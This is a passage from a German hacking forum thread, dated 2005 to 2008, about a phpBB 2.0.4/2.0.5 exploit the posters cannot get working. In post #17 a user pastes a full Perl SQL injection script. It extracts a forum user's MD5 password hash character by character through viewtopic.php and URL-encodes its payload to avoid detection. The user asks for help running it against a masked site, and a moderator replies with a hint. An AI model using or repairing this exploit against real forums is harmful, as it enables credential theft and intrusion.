Security-Board - phpBB Exploit - why the hell doesn't it work?

04.06.2005, 13:36

#13

Smeeth

Aktiv Dabei

Registrierungsdatum: 04.2005

Beiträge: 71

Karma [?]: 31 Smeeth ist auf dem richtigen Weg

AW: phpBB Exploit - why the hell doesn't it work?

Zitat:

Zitat von Muschilecker

MMhhh

bin in den sachen auch Neuling , kann mir mal einer erklären warum bei den meißten Codes keine Proxy Unterstützung mit drin ist ?

(Du meintest warscheinlich Exploits/POCs etc)

Naja ich denk mal zum einen wird es daran liegen, dass es dann noch mehr zu illegale Dinge anstiftet und zum anderen ist der Code dann ein wenig länger. Außerdem ist es ja wirklich einfach ein Proxy support mit reinzumodden.

Zitat:

Zitat von Muschilecker

So und dann wäre es schön zu wissen für Welche Version Nr der Sploit ist.

phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
-> http://securityfocus.com/bid/7979

OffTopic: Muschilecker ?!? Meiner Ansicht nach sollte man solche Namen im Board verbieten.

04.06.2005, 21:05

#14

flummox

Super Moderator

Registrierungsdatum: 03.2004

Ort: Austria

Beiträge: 60

Karma [?]: 15 flummox ist auf dem richtigen Weg

AW: phpBB Exploit - why the hell doesn't it work?

OffTopic:

Zitat:

Zitat von Smeeth

OffTopic: Muschilecker ?!? Meiner Ansicht nach sollte man solche Namen im Board verbieten.

full ack!

Asto, deluxe - macht da mal einer was?

mfg flummox

__________________

Code:

SELECT * FROM users WHERE clue > 0
0 rows returned

06.06.2005, 20:18	#15
ML Neuer Benutzer Registrierungsdatum: 05.2005 Beiträge: 7 Karma [?]: 10	AW: phpBB Exploit - why the hell doesn't it work? Soory is halt mein Nick den ich überall habe. Ich Motze ja auch nicht über deinen ;D

06.06.2005, 20:49	#16
Smeeth Aktiv Dabei Registrierungsdatum: 04.2005 Beiträge: 71 Karma [?]: 31	AW: phpBB Exploit - why the hell doesn't it work? OffTopic: Naja, ich nenn mich ja auch nicht wie eine Sexualpraktik.

04.02.2008, 20:54

#17

DAU45

Neuer Benutzer

Registrierungsdatum: 02.2008

Beiträge: 1

Karma [?]: 10 DAU45 ist auf dem richtigen Weg

AW: phpBB Exploit - why the hell doesn't it work?

Huhu,

ich probiere atm auch mit dem oben genannten Script rum und kommen uach nicht weiter... Beim googeln bin ich auf diese seite gestoßen...

@Asto: Kannst du mir vll sagen wo du was eingesetzt hast, den bei dir gings ja
@Basilisc: Hast du es den zum laufen bekommen? Wenn ja wie.

So siehts bei mir atm aus:

Code:


#!/usr/bin/perl -w

use IO::Socket;

$remote = shift || 'www.****.de';
$view_topic = shift ||  '/forum/viewtopic.php';
$uid = shift || 1;
$port = 80;

$dbtype = 'mysql4';     # mysql4 or pgsql


print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";

$p = "";

for($index=1; $index<=32; $index++)
{
        $socket = IO::Socket::INET->new(PeerAddr => $remote,
                                PeerPort => $port,
                                Proto => "tcp",
                                Type => SOCK_STREAM)
        or die "Couldnt connect to $remote:$port : $@\n";
        $str = "GET $view_topic" . "?sid=1&topic_id=-1" .  random_encode(make_dbsql()) .  "&view=newest" . " 

HTTP/1.0\n\n";

        print $socket $str;
        print $socket "Cookie: phpBB2mysql_sid=1\n";    # replace this for pgsql or remove it
        print $socket "Host: $remote\n\n";

        while ($answer = <$socket>)
        {
                if ($answer =~ /Location:.*\x23(\d+)/)  # Matches the Location: viewtopic.php?p=<num>#<num>           Diese Stelle check ich net... was muss ich da wie einsetzen? 
                {
                        $p .= chr ($1);
                }
        }

        close($socket);
}

print "\nMD5 Hash for uid $uid is $p\n";

# random encode str. helps avoid detection
sub random_encode
{
        $str = shift;
        $ret = "";
        for($i=0; $i<length($str); $i++)
        {
                $c = substr($str,$i,1);
                $j = rand length($str) * 1000;

                if (int($j) % 2 || $c eq ' ')
                {
                        $ret .= "%" . sprintf("%x",ord($c));
                }
                else
                {
                        $ret .= $c;
                }
        }
        return $ret;
}

sub make_dbsql
{
        if ($dbtype eq 'mysql4')
        {
                return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where 

user_id=$uid/*" ;
        } elsif ($dbtype eq 'pgsql')
        {
                return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, 

phpbb_users u where u.user_id=$uid or false";
        }
        else
        {
                return "";
        }
}

Nach ausführen des Scripts bekomm ich nur folgende Anzeige:

Code:

Trying to get password hash for uid 1 server www.*****.de dbtype: mysql4

MD5 Hash for uid 1 is

Danke schonmal!

Der Dau

13.03.2008, 15:51	#18
Asto -vidatu Registrierungsdatum: 02.2002 Ort: Cola Dose Beiträge: 1.520 Karma [?]: 28	AW: phpBB Exploit - why the hell doesn't it work? Ausgeführt wird der letzte code teil Code: else { return ""; } Wieso kannst du dir jetzt selbst erarbeiten __________________ "Immaturity is the incapacity to use one's intelligence without guidance of another." Immanuel Kant Sapere Aude!

Themen-Optionen	Thema durchsuchen
Druckbare Version zeigen Diese Seite per E-Mail verschicken	Thema durchsuchen: Erweiterte Suche
Ansicht	Thema bewerten
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln	Thema bewerten: